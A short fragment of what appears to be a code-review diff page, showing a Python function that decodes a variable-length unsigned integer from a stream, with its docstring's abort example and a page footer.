4287 Traceback (most recent call last):
4288 ...
4288 ...
4289 Abort: stream ended unexpectedly (got 0 bytes, expected 1)
4289 Abort: stream ended unexpectedly (got 0 bytes, expected 1)
4290 """
4290 """
4291 result = 0
4291 result = 0
4292 shift = 0
4292 shift = 0
4293 while True:
4293 while True:
4294 byte = ord(readexactly(fh, 1))
4294 byte = ord(readexactly(fh, 1))
4295 result |= ((byte & 0x7f) << shift)
4295 result |= ((byte & 0x7f) << shift)
4296 if not (byte & 0x80):
4296 if not (byte & 0x80):
4297 return result
4297 return result
4298 shift += 7
4298 shift += 7
General Comments 0
You need to be logged in to leave comments. Login now